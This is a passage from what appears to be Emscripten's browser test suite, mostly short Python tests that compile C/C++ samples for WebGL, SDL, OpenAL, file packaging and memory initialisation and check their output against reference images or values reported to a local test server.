var line = buffer.splice(0);
console.error(line = line.map(function(charCode){return String.fromCharCode(charCode);}).join(''));
} else {
buffer.push(v);
}
}
}
};
</script>
</body>
</html>
""" % self.port)
html_file.close()
c_source_filename = "checksummer.c"
prejs_filename = "worker_prejs.js"
prejs_file = open(prejs_filename, 'w')
prejs_file.write(r"""
if (typeof(Module) === "undefined") Module = {};
Module["arguments"] = ["/bigfile"];
Module["preInit"] = function() {
FS.createLazyFile('/', "bigfile", "http://localhost:11111/bogus_file_path", true, false);
};
var doTrace = true;
Module["print"] = function(s) { self.postMessage({channel: "stdout", line: s}); };
Module["printErr"] = function(s) { self.postMessage({channel: "stderr", char: s, trace: ((doTrace && s === 10) ? new Error().stack : null)}); doTrace = false; };
""")
prejs_file.close()
# vs. os.path.join(self.get_dir(), filename)
# vs. path_from_root('tests', 'hello_world_gles.c')
self.compile_btest([path_from_root('tests', c_source_filename), '-g', '-s', 'SMALL_XHR_CHUNKS=1', '-o', worker_filename,
'--pre-js', prejs_filename])
chunkSize = 1024
data = os.urandom(10 * chunkSize + 1) # 10 full chunks and one 1 byte chunk
checksum = zlib.adler32(data) & 0xffffffff # Python 2 compatibility: force bigint
server = multiprocessing.Process(target=test_chunked_synchronous_xhr_server, args=(True, chunkSize, data, checksum, self.port))
server.start()
# block until the server is actually ready
for i in range(60):
try:
urlopen('http://localhost:11111')
break
except Exception as e:
print('(sleep for server)')
time.sleep(1)
if i == 60:
raise e
try:
self.run_browser(main, 'Chunked binary synchronous XHR in Web Workers!', '/report_result?' + str(checksum))
finally:
server.terminate()
# Avoid a race condition on cleanup: wait a bit so that processes have released their file locks and the test
# tearDown won't attempt to rmdir() files that are still in use.
if WINDOWS:
time.sleep(2)
@requires_graphics_hardware
def test_glgears(self):
def test(args):
self.btest('hello_world_gles.c', reference='gears.png', reference_slack=3,
args=['-DHAVE_BUILTIN_SINCOS', '-lGL', '-lglut'] + args)
# test normally
test([])
# test that a program that doesn't use pthreads still works with pthreads enabled
# (regression test for https://github.com/emscripten-core/emscripten/pull/8059#issuecomment-488105672)
test(['-s', 'USE_PTHREADS=1'])
@requires_graphics_hardware
def test_glgears_long(self):
for proxy in [0, 1]:
print('proxy', proxy)
self.btest('hello_world_gles.c', expected=list(map(str, range(15, 500))), args=['-DHAVE_BUILTIN_SINCOS', '-DLONGTEST', '-lGL', '-lglut', '-DANIMATE'] + (['--proxy-to-worker'] if proxy else []))
@requires_graphics_hardware
def test_glgears_animation(self):
es2_suffix = ['', '_full', '_full_944']
for full_es2 in [0, 1, 2]:
print(full_es2)
self.compile_btest([path_from_root('tests', 'hello_world_gles%s.c' % es2_suffix[full_es2]), '-o', 'something.html',
'-DHAVE_BUILTIN_SINCOS', '-s', 'GL_TESTING=1', '-lGL', '-lglut',
'--shell-file', path_from_root('tests', 'hello_world_gles_shell.html')] +
(['-s', 'FULL_ES2=1'] if full_es2 else []))
self.run_browser('something.html', 'You should see animating gears.', '/report_gl_result?true')
@requires_graphics_hardware
def test_fulles2_sdlproc(self):
self.btest('full_es2_sdlproc.c', '1', args=['-s', 'GL_TESTING=1', '-DHAVE_BUILTIN_SINCOS', '-s', 'FULL_ES2=1', '-lGL', '-lSDL', '-lglut'])
@requires_graphics_hardware
def test_glgears_deriv(self):
self.btest('hello_world_gles_deriv.c', reference='gears.png', reference_slack=2,
args=['-DHAVE_BUILTIN_SINCOS', '-lGL', '-lglut'], outfile='something.html',
message='You should see animating gears.')
with open('something.html') as f:
assert 'gl-matrix' not in f.read(), 'Should not include glMatrix when not needed'
@requires_graphics_hardware
def test_glbook(self):
programs = self.get_library('glbook', [
os.path.join('Chapter_2', 'Hello_Triangle', 'CH02_HelloTriangle.bc'),
os.path.join('Chapter_8', 'Simple_VertexShader', 'CH08_SimpleVertexShader.bc'),
os.path.join('Chapter_9', 'Simple_Texture2D', 'CH09_SimpleTexture2D.bc'),
os.path.join('Chapter_9', 'Simple_TextureCubemap', 'CH09_TextureCubemap.bc'),
os.path.join('Chapter_9', 'TextureWrap', 'CH09_TextureWrap.bc'),
os.path.join('Chapter_10', 'MultiTexture', 'CH10_MultiTexture.bc'),
os.path.join('Chapter_13', 'ParticleSystem', 'CH13_ParticleSystem.bc'),
], configure=None)
def book_path(*pathelems):
return path_from_root('tests', 'glbook', *pathelems)
for program in programs:
print(program)
basename = os.path.basename(program)
args = ['-lGL', '-lEGL', '-lX11']
if basename == 'CH10_MultiTexture.bc':
shutil.copyfile(book_path('Chapter_10', 'MultiTexture', 'basemap.tga'), 'basemap.tga')
shutil.copyfile(book_path('Chapter_10', 'MultiTexture', 'lightmap.tga'), 'lightmap.tga')
args += ['--preload-file', 'basemap.tga', '--preload-file', 'lightmap.tga']
elif basename == 'CH13_ParticleSystem.bc':
shutil.copyfile(book_path('Chapter_13', 'ParticleSystem', 'smoke.tga'), 'smoke.tga')
args += ['--preload-file', 'smoke.tga', '-O2'] # test optimizations here as well for more coverage
self.btest(program,
reference=book_path(basename.replace('.bc', '.png')),
args=args)
@requires_graphics_hardware
def test_gles2_emulation(self):
shutil.copyfile(path_from_root('tests', 'glbook', 'Chapter_10', 'MultiTexture', 'basemap.tga'), 'basemap.tga')
shutil.copyfile(path_from_root('tests', 'glbook', 'Chapter_10', 'MultiTexture', 'lightmap.tga'), 'lightmap.tga')
shutil.copyfile(path_from_root('tests', 'glbook', 'Chapter_13', 'ParticleSystem', 'smoke.tga'), 'smoke.tga')
for source, reference in [
(os.path.join('glbook', 'Chapter_2', 'Hello_Triangle', 'Hello_Triangle_orig.c'), path_from_root('tests', 'glbook', 'CH02_HelloTriangle.png')),
# (os.path.join('glbook', 'Chapter_8', 'Simple_VertexShader', 'Simple_VertexShader_orig.c'), path_from_root('tests', 'glbook', 'CH08_SimpleVertexShader.png')), # XXX needs INT extension in WebGL
(os.path.join('glbook', 'Chapter_9', 'TextureWrap', 'TextureWrap_orig.c'), path_from_root('tests', 'glbook', 'CH09_TextureWrap.png')),
# (os.path.join('glbook', 'Chapter_9', 'Simple_TextureCubemap', 'Simple_TextureCubemap_orig.c'), path_from_root('tests', 'glbook', 'CH09_TextureCubemap.png')), # XXX needs INT extension in WebGL
(os.path.join('glbook', 'Chapter_9', 'Simple_Texture2D', 'Simple_Texture2D_orig.c'), path_from_root('tests', 'glbook', 'CH09_SimpleTexture2D.png')),
(os.path.join('glbook', 'Chapter_10', 'MultiTexture', 'MultiTexture_orig.c'), path_from_root('tests', 'glbook', 'CH10_MultiTexture.png')),
(os.path.join('glbook', 'Chapter_13', 'ParticleSystem', 'ParticleSystem_orig.c'), path_from_root('tests', 'glbook', 'CH13_ParticleSystem.png')),
]:
print(source)
self.btest(source,
reference=reference,
args=['-I' + path_from_root('tests', 'glbook', 'Common'),
path_from_root('tests', 'glbook', 'Common', 'esUtil.c'),
path_from_root('tests', 'glbook', 'Common', 'esShader.c'),
path_from_root('tests', 'glbook', 'Common', 'esShapes.c'),
path_from_root('tests', 'glbook', 'Common', 'esTransform.c'),
'-s', 'FULL_ES2=1', '-lGL', '-lEGL', '-lX11',
'--preload-file', 'basemap.tga', '--preload-file', 'lightmap.tga', '--preload-file', 'smoke.tga'])
@requires_graphics_hardware
def test_clientside_vertex_arrays_es3(self):
# NOTE: Should FULL_ES3=1 imply client-side vertex arrays? The emulation needs FULL_ES2=1 for now.
self.btest('clientside_vertex_arrays_es3.c', reference='gl_triangle.png', args=['-s', 'USE_WEBGL2=1', '-s', 'FULL_ES2=1', '-s', 'FULL_ES3=1', '-s', 'USE_GLFW=3', '-lglfw', '-lGLESv2'])
def test_emscripten_api(self):
self.btest('emscripten_api_browser.cpp', '1', args=['-s', '''EXPORTED_FUNCTIONS=['_main', '_third']''', '-lSDL'])
def test_emscripten_api2(self):
def setup():
create_test_file('script1.js', '''
Module._set(456);
''')
create_test_file('file1.txt', 'first')
create_test_file('file2.txt', 'second')
setup()
run_process([PYTHON, FILE_PACKAGER, 'test.data', '--preload', 'file1.txt', 'file2.txt'], stdout=open('script2.js', 'w'))
self.btest('emscripten_api_browser2.cpp', '1', args=['-s', '''EXPORTED_FUNCTIONS=['_main', '_set']''', '-s', 'FORCE_FILESYSTEM=1'])
# check using the file packager with output going to another dir
self.clear()
setup()
os.mkdir('sub')
run_process([PYTHON, FILE_PACKAGER, 'sub/test.data', '--preload', 'file1.txt', 'file2.txt'], stdout=open('script2.js', 'w'))
shutil.copyfile(os.path.join('sub', 'test.data'), 'test.data')
self.btest('emscripten_api_browser2.cpp', '1', args=['-s', '''EXPORTED_FUNCTIONS=['_main', '_set']''', '-s', 'FORCE_FILESYSTEM=1'])
def test_emscripten_api_infloop(self):
self.btest('emscripten_api_browser_infloop.cpp', '7')
def test_emscripten_fs_api(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png') # preloaded *after* run
self.btest('emscripten_fs_api_browser.cpp', '1', args=['-lSDL'])
def test_emscripten_fs_api2(self):
self.btest('emscripten_fs_api_browser2.cpp', '1', args=['-s', "ASSERTIONS=0"])
self.btest('emscripten_fs_api_browser2.cpp', '1', args=['-s', "ASSERTIONS=1"])
@requires_threads
def test_emscripten_main_loop(self):
for args in [[], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'EXIT_RUNTIME=1']]:
self.btest('emscripten_main_loop.cpp', '0', args=args)
@requires_threads
def test_emscripten_main_loop_settimeout(self):
for args in [[], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1']]:
self.btest('emscripten_main_loop_settimeout.cpp', '1', args=args)
@requires_threads
def test_emscripten_main_loop_and_blocker(self):
for args in [[], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1']]:
self.btest('emscripten_main_loop_and_blocker.cpp', '0', args=args)
@requires_threads
def test_emscripten_main_loop_setimmediate(self):
for args in [[], ['--proxy-to-worker'], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1']]:
self.btest('emscripten_main_loop_setimmediate.cpp', '1', args=args)
def test_fs_after_main(self):
for args in [[], ['-O1']]:
self.btest('fs_after_main.cpp', '0', args=args)
def test_sdl_quit(self):
self.btest('sdl_quit.c', '1', args=['-lSDL', '-lGL'])
def test_sdl_resize(self):
self.btest('sdl_resize.c', '1', args=['-lSDL', '-lGL'])
def test_glshaderinfo(self):
self.btest('glshaderinfo.cpp', '1', args=['-lGL', '-lglut'])
@requires_graphics_hardware
def test_glgetattachedshaders(self):
self.btest('glgetattachedshaders.c', '1', args=['-lGL', '-lEGL'])
# Covered by the dEQP test suite (we can remove it later if we add coverage for that).
@requires_graphics_hardware
def test_glframebufferattachmentinfo(self):
self.btest('glframebufferattachmentinfo.c', '1', args=['-lGLESv2', '-lEGL'])
@requires_graphics_hardware
def test_sdlglshader(self):
self.btest('sdlglshader.c', reference='sdlglshader.png', args=['-O2', '--closure', '1', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_sdlglshader2(self):
self.btest('sdlglshader2.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_gl_glteximage(self):
self.btest('gl_teximage.c', '1', args=['-lGL', '-lSDL'])
@requires_graphics_hardware
@requires_threads
def test_gl_textures(self):
for args in [[], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'OFFSCREEN_FRAMEBUFFER=1']]:
self.btest('gl_textures.cpp', '0', args=['-lGL'] + args)
@requires_graphics_hardware
def test_gl_ps(self):
# pointers and a shader
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('gl_ps.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '--use-preload-plugins'], reference_slack=1)
@requires_graphics_hardware
def test_gl_ps_packed(self):
# packed data that needs to be strided
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('gl_ps_packed.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '--use-preload-plugins'], reference_slack=1)
@requires_graphics_hardware
def test_gl_ps_strides(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('gl_ps_strides.c', reference='gl_ps_strides.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '--use-preload-plugins'])
@requires_graphics_hardware
def test_gl_ps_worker(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('gl_ps_worker.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '--use-preload-plugins'], reference_slack=1, also_proxied=True)
@requires_graphics_hardware
def test_gl_renderers(self):
self.btest('gl_renderers.c', reference='gl_renderers.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_gl_stride(self):
self.btest('gl_stride.c', reference='gl_stride.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_gl_vertex_buffer_pre(self):
self.btest('gl_vertex_buffer_pre.c', reference='gl_vertex_buffer_pre.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_gl_vertex_buffer(self):
self.btest('gl_vertex_buffer.c', reference='gl_vertex_buffer.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], reference_slack=1)
@requires_graphics_hardware
def test_gles2_uniform_arrays(self):
self.btest('gles2_uniform_arrays.cpp', args=['-s', 'GL_ASSERTIONS=1', '-lGL', '-lSDL'], expected=['1'], also_proxied=True)
@requires_graphics_hardware
def test_gles2_conformance(self):
self.btest('gles2_conformance.cpp', args=['-s', 'GL_ASSERTIONS=1', '-lGL', '-lSDL'], expected=['1'])
@requires_graphics_hardware
def test_matrix_identity(self):
self.btest('gl_matrix_identity.c', expected=['-1882984448', '460451840', '1588195328', '2411982848'], args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre(self):
self.btest('cubegeom_pre.c', reference='cubegeom_pre.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre_regal(self):
self.btest('cubegeom_pre.c', reference='cubegeom_pre.png', args=['-s', 'USE_REGAL=1', '-DUSE_REGAL', '-lGL', '-lSDL'])
@requires_graphics_hardware
@requires_sync_compilation
def test_cubegeom_pre_relocatable(self):
self.btest('cubegeom_pre.c', reference='cubegeom_pre.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '-s', 'RELOCATABLE=1'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre2(self):
self.btest('cubegeom_pre2.c', reference='cubegeom_pre2.png', args=['-s', 'GL_DEBUG=1', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL']) # some coverage for GL_DEBUG not breaking the build
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre3(self):
self.btest('cubegeom_pre3.c', reference='cubegeom_pre2.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom(self):
self.btest('cubegeom.c', reference='cubegeom.png', args=['-O2', '-g', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_cubegeom_regal(self):
self.btest('cubegeom.c', reference='cubegeom.png', args=['-O2', '-g', '-DUSE_REGAL', '-s', 'USE_REGAL=1', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_cubegeom_proc(self):
create_test_file('side.c', r'''
extern void* SDL_GL_GetProcAddress(const char *);
void *glBindBuffer = 0; // same name as the gl function, to check that the collision does not break us
void *getBindBuffer() {
if (!glBindBuffer) glBindBuffer = SDL_GL_GetProcAddress("glBindBuffer");
return glBindBuffer;
}
''')
# also test -Os in wasm, which uses meta-dce; that should not break the legacy GL emulation hacks
for opts in [[], ['-O1'], ['-Os', '-s', 'WASM=1']]:
self.btest('cubegeom_proc.c', reference='cubegeom.png', args=opts + ['side.c', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_glew(self):
self.btest('cubegeom_glew.c', reference='cubegeom.png', args=['-O2', '--closure', '1', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lGLEW', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_color(self):
self.btest('cubegeom_color.c', reference='cubegeom_color.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_normal(self):
self.btest('cubegeom_normal.c', reference='cubegeom_normal.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_cubegeom_normal_dap(self): # draw is given a direct pointer to clientside memory, no element array buffer
self.btest('cubegeom_normal_dap.c', reference='cubegeom_normal.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_cubegeom_normal_dap_far(self): # indices do not start from 0
self.btest('cubegeom_normal_dap_far.c', reference='cubegeom_normal.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_normal_dap_far_range(self): # glDrawRangeElements
self.btest('cubegeom_normal_dap_far_range.c', reference='cubegeom_normal.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_normal_dap_far_glda(self): # use glDrawArrays
self.btest('cubegeom_normal_dap_far_glda.c', reference='cubegeom_normal_dap_far_glda.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_normal_dap_far_glda_quad(self): # with quad
self.btest('cubegeom_normal_dap_far_glda_quad.c', reference='cubegeom_normal_dap_far_glda_quad.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_mt(self):
self.btest('cubegeom_mt.c', reference='cubegeom_mt.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL']) # multitexture
@requires_graphics_hardware
def test_cubegeom_color2(self):
self.btest('cubegeom_color2.c', reference='cubegeom_color2.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_cubegeom_texturematrix(self):
self.btest('cubegeom_texturematrix.c', reference='cubegeom_texturematrix.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_fog(self):
self.btest('cubegeom_fog.c', reference='cubegeom_fog.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre_vao(self):
self.btest('cubegeom_pre_vao.c', reference='cubegeom_pre_vao.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre_vao_regal(self):
self.btest('cubegeom_pre_vao.c', reference='cubegeom_pre_vao.png', args=['-s', 'USE_REGAL=1', '-DUSE_REGAL', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre2_vao(self):
self.btest('cubegeom_pre2_vao.c', reference='cubegeom_pre_vao.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_pre2_vao2(self):
self.btest('cubegeom_pre2_vao2.c', reference='cubegeom_pre2_vao2.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre_vao_es(self):
self.btest('cubegeom_pre_vao_es.c', reference='cubegeom_pre_vao.png', args=['-s', 'FULL_ES2=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_u4fv_2(self):
self.btest('cubegeom_u4fv_2.c', reference='cubegeom_u4fv_2.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cube_explosion(self):
self.btest('cube_explosion.c', reference='cube_explosion.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_glgettexenv(self):
self.btest('glgettexenv.c', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], expected=['1'])
def test_sdl_canvas_blank(self):
self.btest('sdl_canvas_blank.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_blank.png')
def test_sdl_canvas_palette(self):
self.btest('sdl_canvas_palette.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_palette.png')
def test_sdl_canvas_twice(self):
self.btest('sdl_canvas_twice.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_twice.png')
def test_sdl_set_clip_rect(self):
self.btest('sdl_set_clip_rect.c', args=['-lSDL', '-lGL'], reference='sdl_set_clip_rect.png')
def test_sdl_maprgba(self):
self.btest('sdl_maprgba.c', args=['-lSDL', '-lGL'], reference='sdl_maprgba.png', reference_slack=3)
def test_sdl_create_rgb_surface_from(self):
self.btest('sdl_create_rgb_surface_from.c', args=['-lSDL', '-lGL'], reference='sdl_create_rgb_surface_from.png')
def test_sdl_rotozoom(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_rotozoom.c', reference='sdl_rotozoom.png', args=['--preload-file', 'screenshot.png', '--use-preload-plugins', '-lSDL', '-lGL'], reference_slack=3)
def test_sdl_gfx_primitives(self):
self.btest('sdl_gfx_primitives.c', args=['-lSDL', '-lGL'], reference='sdl_gfx_primitives.png', reference_slack=1)
def test_sdl_canvas_palette_2(self):
create_test_file('pre.js', '''
Module['preRun'].push(function() {
SDL.defaults.copyOnLock = false;
});
''')
create_test_file('args-r.js', '''
Module['arguments'] = ['-r'];
''')
create_test_file('args-g.js', '''
Module['arguments'] = ['-g'];
''')
create_test_file('args-b.js', '''
Module['arguments'] = ['-b'];
''')
self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_r.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-r.js', '-lSDL', '-lGL'])
self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_g.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-g.js', '-lSDL', '-lGL'])
self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_b.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-b.js', '-lSDL', '-lGL'])
def test_sdl_ttf_render_text_solid(self):
self.btest('sdl_ttf_render_text_solid.c', reference='sdl_ttf_render_text_solid.png', args=['-O2', '-s', 'TOTAL_MEMORY=16MB', '-lSDL', '-lGL'])
def test_sdl_alloctext(self):
self.btest('sdl_alloctext.c', expected='1', args=['-O2', '-s', 'TOTAL_MEMORY=16MB', '-lSDL', '-lGL'])
def test_sdl_surface_refcount(self):
self.btest('sdl_surface_refcount.c', args=['-lSDL'], expected='1')
def test_sdl_free_screen(self):
self.btest('sdl_free_screen.cpp', args=['-lSDL', '-lGL'], reference='htmltest.png')
@requires_graphics_hardware
def test_glbegin_points(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('glbegin_points.c', reference='glbegin_points.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '--use-preload-plugins'])
@requires_graphics_hardware
def test_s3tc(self):
shutil.copyfile(path_from_root('tests', 'screenshot.dds'), 'screenshot.dds')
self.btest('s3tc.c', reference='s3tc.png', args=['--preload-file', 'screenshot.dds', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_s3tc_ffp_only(self):
shutil.copyfile(path_from_root('tests', 'screenshot.dds'), 'screenshot.dds')
self.btest('s3tc.c', reference='s3tc.png', args=['--preload-file', 'screenshot.dds', '-s', 'LEGACY_GL_EMULATION=1', '-s', 'GL_FFP_ONLY=1', '-lGL', '-lSDL'])
@no_chrome('see #7117')
@requires_graphics_hardware
def test_aniso(self):
if SPIDERMONKEY_ENGINE in JS_ENGINES:
# asm.js-ification check
self.compile_btest([path_from_root('tests', 'aniso.c'), '-O2', '-g2', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '-Wno-incompatible-pointer-types'])
self.set_setting('ASM_JS', 1)
self.run_generated_code(SPIDERMONKEY_ENGINE, 'a.out.js', assert_returncode=None)
print('passed asm test')
shutil.copyfile(path_from_root('tests', 'water.dds'), 'water.dds')
self.btest('aniso.c', reference='aniso.png', reference_slack=2, args=['--preload-file', 'water.dds', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '-Wno-incompatible-pointer-types'])
@requires_graphics_hardware
def test_tex_nonbyte(self):
self.btest('tex_nonbyte.c', reference='tex_nonbyte.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_float_tex(self):
self.btest('float_tex.cpp', reference='float_tex.png', args=['-lGL', '-lglut'])
@requires_graphics_hardware
def test_subdata(self):
self.btest('gl_subdata.cpp', reference='float_tex.png', args=['-lGL', '-lglut'])
@requires_graphics_hardware
def test_perspective(self):
self.btest('perspective.c', reference='perspective.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_glerror(self):
self.btest('gl_error.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL'])
def test_openal_error(self):
for args in [[], ['--closure', '1']]:
print(args)
self.btest('openal_error.c', expected='1', args=args)
def test_openal_capture_sanity(self):
self.btest('openal_capture_sanity.c', expected='0')
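# Builds a side module (as wasm, and as JS on fastcomp) and links it at runtime from a main
# module via RUNTIME_LINKED_LIBS.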
def test_runtimelink(self):
for wasm in [0, 1]:
if not wasm and self.is_wasm_backend():
continue
print(wasm)
main, supp = self.setup_runtimelink_test()
create_test_file('supp.cpp', supp)
self.compile_btest(['supp.cpp', '-o', 'supp.' + ('wasm' if wasm else 'js'), '-s', 'SIDE_MODULE=1', '-O2', '-s', 'WASM=%d' % wasm, '-s', 'EXPORT_ALL=1'])
self.btest(main, args=['-DBROWSER=1', '-s', 'MAIN_MODULE=1', '-O2', '-s', 'WASM=%d' % wasm, '-s', 'RUNTIME_LINKED_LIBS=["supp.' + ('wasm' if wasm else 'js') + '"]', '-s', 'EXPORT_ALL=1'], expected='76')
def test_pre_run_deps(self):
# Adding a dependency in preRun will delay run
create_test_file('pre.js', '''
Module.preRun = function() {
addRunDependency();
out('preRun called, added a dependency...');
setTimeout(function() {
Module.okk = 10;
removeRunDependency()
}, 2000);
};
''')
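# addRunDependency()/removeRunDependency() form a counter that gates run(): while the
# counter is non-zero, main() is not called. The 2s timeout above should therefore delay
# startup until Module.okk has been set, which the native side presumably reads and reports.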
for mem in [0, 1]:
self.btest('pre_run_deps.cpp', expected='10', args=['--pre-js', 'pre.js', '--memory-init-file', str(mem)])
@no_wasm_backend('mem init file')
def test_mem_init(self):
create_test_file('pre.js', '''
function myJSCallback() { // called from main()
Module._note(1);
}
Module.preRun = function() {
addOnPreMain(function() {
Module._note(2);
});
};
''')
create_test_file('post.js', '''
var assert = function(check, text) {
if (!check) {
console.log('assert failed: ' + text);
maybeReportResultToServer(9);
}
}
Module._note(4); // this happens too early! and is overwritten when the mem init arrives
''')
# with assertions, we notice when memory was written to too early
self.btest('mem_init.cpp', expected='9', args=['-s', 'WASM=0', '--pre-js', 'pre.js', '--post-js', 'post.js', '--memory-init-file', '1'])
# otherwise, we just overwrite
self.btest('mem_init.cpp', expected='3', args=['-s', 'WASM=0', '--pre-js', 'pre.js', '--post-js', 'post.js', '--memory-init-file', '1', '-s', 'ASSERTIONS=0'])
@no_wasm_backend('mem init file')
def test_mem_init_request(self):
def test(what, status):
print(what, status)
create_test_file('pre.js', '''
var xhr = Module.memoryInitializerRequest = new XMLHttpRequest();
xhr.open('GET', "''' + what + '''", true);
xhr.responseType = 'arraybuffer';
xhr.send(null);
console.warn = function(x) {
if (x.indexOf('a problem seems to have happened with Module.memoryInitializerRequest') >= 0) {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:%s/report_result?0');
setTimeout(xhr.onload = function() {
console.log('close!');
window.close();
}, 1000);
xhr.send();
throw 'halt';
}
console.log('WARNING: ' + x);
};
''' % self.port)
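# Module.memoryInitializerRequest lets the page supply its own XHR for the .mem file;
# the runtime then waits on that request instead of issuing one itself. Requesting a
# bogus URL ('nothing.nowhere') should hit the warning path checked above.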
self.btest('mem_init_request.cpp', expected=status, args=['-s', 'WASM=0', '--pre-js', 'pre.js', '--memory-init-file', '1'])
test('test.html.mem', '1')
test('nothing.nowhere', '0')
def test_runtime_misuse(self):
post_prep = '''
var expected_ok = false;
function doCcall(n) {
ccall('note', 'string', ['number'], [n]);
}
var wrapped = cwrap('note', 'string', ['number']); // returns a string to suppress cwrap optimization
